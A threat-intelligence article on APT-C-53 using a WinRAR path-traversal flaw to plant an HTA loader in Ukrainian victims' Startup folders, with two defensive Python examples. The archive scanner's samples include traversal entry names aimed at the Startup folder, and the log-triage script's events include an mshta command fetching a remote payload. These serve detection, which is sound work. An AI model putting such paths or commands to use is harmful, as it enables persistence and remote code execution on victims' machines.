APT-C-53 Hits Ukraine: New Attack Exploits WinRAR Flaw for Persistence
APT-C-53 has once again intensified its distribution of malicious attachments targeting organizations in Ukraine. The latest wave of attacks demonstrates that the group continues to refine its stealth-penetration toolkit and to update its initial-access techniques, pairing them with its long-established multilayered script-execution framework.
According to the 360 Threat Intelligence Center, the attackers are exploiting CVE-2025-8088 in the WinRAR archiver—a flaw that enables hidden data to be written into arbitrary system directories. The victim receives an email containing an archive that appears to hold only a harmless file. When extraction is attempted, a directory-traversal mechanism is triggered, silently depositing a malicious HTA file into the Windows startup folder. The HTA is executed at the next login, granting the attackers persistence.
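The attachment-filtering control this technique calls for is an inspection of archive entry names before anything is written to disk. The following Python is an added example, not code from the report or from any vendor product; it does not parse RAR itself, but takes the list of entry names an archive reader exposes and flags traversal components, absolute paths, alternate-data-stream syntax, script payloads and anything aimed at a Startup folder, then checks that each entry would still resolve inside the extraction directory. The entry names, the `/tmp/extract` destination and the labels are constructed for illustration.

```python
"""Pre-extraction inspection of archive entry names (added example).

Works on the entry-name list an archive reader reports. The sample names
below are constructed to model the traversal pattern described in the
article; they are not taken from any real sample.
"""
import posixpath
import re
from typing import Dict, List

# Constructed sample entries: one benign-looking document, one normal
# subdirectory file, and four entries a gateway should refuse.
SAMPLE_ENTRIES = [
    "Invoice_2025.pdf",
    "docs/readme.txt",
    "../../../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/update.hta",
    "..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.hta",
    "C:\\Users\\Public\\run.hta",
    "report.pdf:hidden.hta",
]

STARTUP_MARKER = "start menu/programs/startup"
SCRIPT_EXTENSIONS = (".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".lnk", ".scr")
DRIVE_RE = re.compile(r"^[A-Za-z]:")


def normalize(name: str) -> str:
    """Unify separators so Windows- and POSIX-style names are checked alike."""
    return name.replace("\\", "/")


def inspect_entry(name: str) -> List[str]:
    """Return the reasons an entry name is unsafe; an empty list means clean."""
    reasons: List[str] = []
    norm = normalize(name)
    parts = norm.split("/")
    if norm.startswith("/") or DRIVE_RE.match(norm):
        reasons.append("absolute-path")
    if ".." in parts:
        reasons.append("traversal-component")
    # A colon anywhere except a leading two-character drive prefix is
    # alternate-data-stream syntax, which has no place in an archive entry.
    for i, part in enumerate(parts):
        if ":" in part and not (i == 0 and len(part) == 2 and DRIVE_RE.match(part)):
            reasons.append("ads-syntax")
            break
    if STARTUP_MARKER in norm.lower():
        reasons.append("targets-startup-folder")
    if norm.lower().endswith(SCRIPT_EXTENSIONS):
        reasons.append("script-payload")
    return reasons


def resolves_inside(dest: str, name: str) -> bool:
    """True only if the entry's final path stays under dest after normalization."""
    dest_norm = posixpath.normpath(normalize(dest))
    norm = normalize(name)
    if norm.startswith("/") or DRIVE_RE.match(norm):
        return False
    final = posixpath.normpath(posixpath.join(dest_norm, norm))
    return final == dest_norm or final.startswith(dest_norm + "/")


def scan_entries(entries: List[str], dest: str = "/tmp/extract") -> Dict[str, List[str]]:
    """Map each flagged entry to its reasons; clean entries are omitted."""
    findings: Dict[str, List[str]] = {}
    for name in entries:
        reasons = inspect_entry(name)
        if not resolves_inside(dest, name):
            reasons.append("escapes-destination")
        if reasons:
            findings[name] = reasons
    return findings


def gateway_verdict(entries: List[str], dest: str = "/tmp/extract") -> str:
    """Mail-gateway style decision: quarantine the archive if anything was flagged."""
    return "quarantine" if scan_entries(entries, dest) else "allow"


if __name__ == "__main__":
    for entry, why in scan_entries(SAMPLE_ENTRIES).items():
        print(f"{entry!r}: {', '.join(why)}")
    print("verdict:", gateway_verdict(SAMPLE_ENTRIES))
```

The destination check is deliberately separate from the name heuristics: an archiver that honours traversal components will land the file wherever the normalized path points, so the gateway should reason about the final location rather than only about the presence of `..`.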
The HTA-based loader created by the group launches a compact VBScript whose task is to invoke mshta.exe and retrieve the next stage of malicious code from a remote server, disguised as a PDF. After processing, the script unfolds a multilayered VBS structure containing fragments that are decoded at runtime. These fragments include communication algorithms for command-and-control servers, data-collection utilities, and components for deploying additional covert mechanisms.
Once the primary payload has executed, the script ensures persistence through several channels. In addition to planting entries in the startup folder, it creates duplicate files within user directories and adds a fraudulent scheduled task whose name mimics a legitimate system entry. This establishes a secondary persistence layer capable of surviving reboots or administrative intervention. The configured communication points include primary and fallback addresses to maintain continuity of the command infrastructure.
The sequence of operations, choice of tools, and characteristic multilayered VBS scripts align closely with APT-C-53’s long-running campaigns of clandestine data collection against Ukrainian entities. The combination of a newly exploited vulnerability and a well-practiced execution chain enables the group to maintain resilience and hinder detection.
Experts recommend strengthening attachment filtering on mail gateways, with particular attention to archives containing atypical or suspicious content. They further underscore the need for enhanced monitoring of system logs—especially events related to startup entries, scheduled-task creation, and script execution. Improving workstation hardening, regularly updating security solutions, and scrutinizing suspicious files can significantly reduce the risk of data loss from such incidents.
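The three log-monitoring areas named above, together with the persistence channels described earlier (startup-folder entries and a scheduled task with a system-looking name), map onto a small set of detection rules. The Python below is an added example, not part of the report; it runs those rules over constructed event records shaped like Sysmon process-creation (EventID 1) and file-creation (EventID 11) events and the Security log's scheduled-task-created event (4698), flattened to dictionaries. The user names, paths, task names and the `example.invalid` host are all constructed; the treatment of user-registered tasks under the `\Microsoft\` tree as suspicious is a hunting heuristic, not a rule from the article.

```python
"""Rule-based triage of Windows events for the behaviours the article lists
(startup-folder writes, scheduled-task creation, script-host execution).

Added example. Field names follow Sysmon (Image, ParentImage, CommandLine,
TargetFilename) and Security 4698 (SubjectUserName, TaskName, TaskContent);
the records themselves are constructed, not real telemetry.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".hta", ".vbs", ".vbe", ".js", ".wsf")
SYSTEM_ACCOUNTS = {"system", "local service", "network service"}
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events: three that should alert, two that should not.
SAMPLE_EVENTS: List[Dict] = [
    {"channel": "Sysmon", "EventID": 11, "Image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.hta"},
    {"channel": "Sysmon", "EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta.exe https://example.invalid/doc.pdf"},
    {"channel": "Security", "EventID": 4698, "SubjectUserName": "alice",
     "TaskName": "\\Microsoft\\Windows\\Maintenance\\Update Check",
     "TaskContent": "<Exec><Command>wscript.exe</Command><Arguments>C:\\Users\\alice\\a.vbs</Arguments></Exec>"},
    {"channel": "Sysmon", "EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe notes.txt"},
    {"channel": "Security", "EventID": 4698, "SubjectUserName": "SYSTEM",
     "TaskName": "\\Backup\\Nightly",
     "TaskContent": "<Exec><Command>C:\\Tools\\backup.exe</Command></Exec>"},
]


def basename(path: str) -> str:
    """Last component of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def rule_startup_script_drop(ev: Dict) -> Optional[str]:
    """Sysmon 11: a script file written into a Startup folder."""
    if ev.get("EventID") != 11:
        return None
    target = ev.get("TargetFilename", "")
    if STARTUP_RE.search(target) and target.lower().endswith(SCRIPT_EXTS):
        return f"script dropped in Startup folder by {basename(ev.get('Image', ''))}: {target}"
    return None


def rule_script_host_remote(ev: Dict) -> Optional[str]:
    """Sysmon 1: a script host launched with a URL on its command line."""
    if ev.get("EventID") != 1:
        return None
    image = basename(ev.get("Image", "")).lower()
    cmd = ev.get("CommandLine", "")
    if image in SCRIPT_HOSTS and URL_RE.search(cmd):
        return f"{image} fetching remote content: {cmd}"
    return None


def rule_task_runs_script_host(ev: Dict) -> Optional[str]:
    """Security 4698: a new task whose action is a script host.

    Severity is raised when a non-system account registers the task under
    the \\Microsoft\\ tree, where user-created tasks are unusual (heuristic)."""
    if ev.get("EventID") != 4698:
        return None
    content = ev.get("TaskContent", "").lower()
    if not any(host in content for host in SCRIPT_HOSTS):
        return None
    name = ev.get("TaskName", "")
    who = ev.get("SubjectUserName", "")
    msg = f"scheduled task {name!r} runs a script host (registered by {who})"
    if name.lower().startswith("\\microsoft\\") and who.lower() not in SYSTEM_ACCOUNTS:
        msg += "; system-looking name from a user account"
    return msg


RULES: List[Tuple[str, Callable[[Dict], Optional[str]]]] = [
    ("startup_script_drop", rule_startup_script_drop),
    ("script_host_remote", rule_script_host_remote),
    ("task_runs_script_host", rule_task_runs_script_host),
]


def triage(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """Run every rule over every event; return (event index, rule name, message)."""
    alerts: List[Tuple[int, str, str]] = []
    for idx, ev in enumerate(events):
        for rule_name, rule in RULES:
            hit = rule(ev)
            if hit:
                alerts.append((idx, rule_name, hit))
    return alerts


if __name__ == "__main__":
    for idx, rule_name, msg in triage(SAMPLE_EVENTS):
        print(f"[{rule_name}] event {idx}: {msg}")
```

Each rule is independent, so the three alerts above would also fire individually; correlating them on the same host and user within a short window is what separates this chain from an administrator legitimately using `wscript.exe` in a task.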